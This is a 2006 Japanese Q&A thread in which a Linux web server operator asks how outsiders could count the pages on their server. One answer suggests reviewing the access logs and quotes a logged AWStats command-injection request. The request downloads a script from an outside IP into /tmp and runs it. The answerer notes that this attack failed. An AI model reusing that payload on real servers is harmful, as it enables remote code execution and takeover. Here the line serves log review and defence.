LinuxでWebサーバを運営しています。他人 というか中国人のブログで 自分のサーバのユーザページ数が公開されてるんですけど 簡単に外部から解析出来るんですか?それともユーザディレクトリにCGIを置かれた?CGIの場合解析阻止にはCGI実行できなくするしか方法はないでしょうか?

回答の条件
  • URL必須
  • 1人2回まで
  • 登録:2006/02/01 22:39:55
  • 終了:--

回答(2件)

id:inosisibeyan No.1

inosisibeyan回答回数211ベストアンサー獲得回数02006/02/01 23:01:45

ポイント90pt

自動巡回ソフトなどでも、同様のことが出来ます。

ページ数のみなら更に簡単だと思います。

心配でしたら、httpdのログを見直されてはどうでしょうか。

less /var/log/httpd/access_log.1 | grep wget

XXX.XXX.XXX.XXX - - [28/Jan/2006:21:36:06 +0900] ”GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1” 404 299 ”-” ”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”


上の例は、どうやらアタックのようですが通っていないです。

もしCGIを置かれているならば、アタックと同じplファイルなどが見つかります。

#updatedb &

#locate awstats.pl

#

と言った手順で、例のようなファイルがあれば検出されるはずです。

id:yoshi5231

なるほど 参考にします

2006/02/02 12:15:50
id:hive7134 No.2

hive7134回答回数167ベストアンサー獲得回数162006/02/01 23:56:07

ポイント30pt

サイト内にある、ネットに公開されているページ数は、このようにGoogleを利用するなどして取得できると思いますが、こういった状況とは異なるのでしょうか?

id:yoshi5231

巡回ロボットが拾ってないHTMLは これで検出できないのでは?

2006/02/02 12:17:50

コメントはまだありません

この質問への反応(ブックマークコメント)

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

絞り込み :
はてなココの「ともだち」を表示します。
回答リクエストを送信したユーザーはいません